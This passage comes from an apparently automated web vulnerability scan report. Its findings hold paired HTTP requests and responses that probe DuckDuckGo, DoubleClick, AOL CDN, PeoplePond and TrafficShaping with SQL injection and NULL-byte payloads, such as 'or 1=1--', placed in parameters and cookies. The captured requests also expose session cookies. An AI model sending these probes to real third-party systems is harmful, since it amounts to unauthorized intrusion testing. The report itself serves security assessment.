   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();

Request 2

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d2--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2015
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=4455513933353556785a75734b5367744a32383868616979393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();

1.10. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00'&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 504 Gateway Time-out
Server: nginx
Date: Tue, 01 Mar 2011 02:01:37 GMT
Content-Type: text/html
Content-Length: 4637
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/"/><meta http-equiv="content-type" content="text
...[SNIP]...
<div id="error">
...[SNIP]...

Request 2

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00''&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:40 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4275
Etag: "2016ae18671a1b7b5e0ddeaa2c318965da72dc98"

nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_vid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:53 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.13. http://o.aolcdn.com/os_merge/ [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Request 1

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1835
Cache-Control: public, max-age=30
Expires: Sun, 27 Feb 2011 17:46:13 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect (Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooks
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d2--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Tue, 29 Mar 2011 17:45:43 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15821

(function(d,c){d.inlineCSS=function(b){var a=c.createElement("style"),e=c.getElementsByTagName("head")[0];a.setAttribute("type","text/css");if(a.styleSheet)a.styleSheet.cssText=b;else{b=c.createTextNode(b);a.appendChild(b)}e.appendChild(a)}})(jQuery,document);
// jquery.openwindow-1.0.min.js
(function(i,o){var q=0;i.openWindow=function(h,a){a=i.extend({width:"60%",height:"60%",top:"middle",left:"center",location:1,menubar:0,toolbar:0,bookmarks:0,status:0,resizable:1,scroll:1,gui:40,name:"jQuery_popUp",nu:0,focus:1},a);var b=[],m=a.nu?a.name+q++:a.name,j=o.screen,e=j.height,k=j.width,f=a.width,g=a.height,c=a.left,d=a.top,r=a.gui;j=["location","menubar","toolbar","bookmarks","status","resizable","scroll"];var p=j.length,n=Math.round,l=function(s,t){return n(t*s.replace("%","")/100)};if(f.indexOf)if(f.indexOf("%"))f=
l(f,k);b.push("width="+f);if(g.indexOf)if(g.indexOf("%"))g=l(g,e);b.push("height="+g);if(c.indexOf)if(c.indexOf("%")!==-1)c=l(c,k);else switch(c){case "center":c=n((k-f)/2);break;case "left":c=0;break;case "right":c=k-f}b.push("left="+c);if(d.indexOf)if(d.indexOf("%")!==-1)d=l(d,e);else switch(d){case "middle":d=n((e-g)/2)-r;break;case "top":d=0;break;case "bottom":d=e-g}for(b.push("top="+d);p--;){e=j[p];b.push(e+"="+(a[e]?"yes":"no"))}h=o.open(h,m,b.join(","));a.focus&&h.focus();return h};i.fn.openWindow=
function(h){return this.each(function(){var a=this,b=a.href;b&&i(a).click(function(m){m.preventDefault();i.openWindow(b,h)})})}})(jQuery,window);
/*

   jQuery Omniture Tracking Plugin
   Eaily attach click tracking to any link.
   
   Dependencies:
   - Omniture H Code (s_265 object)
   - jQuery 1.4.2
   
   Usage:
   
   $("#my-link").omniTrack({
       suite: "aolshare", // Suite the click
...[SNIP]...

1.14. http://peoplepond.com/_mint/ [MintUnique cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://peoplepond.com
Path:   /_mint/

Request 1

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d1--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5171
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=343430744850704d4435326e6e73383850754b394350495a4d61673231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plug
...[SNIP]...

Request 2

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d2--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5161
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=383430353263524c3861594c76386f69676f565539326b31';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
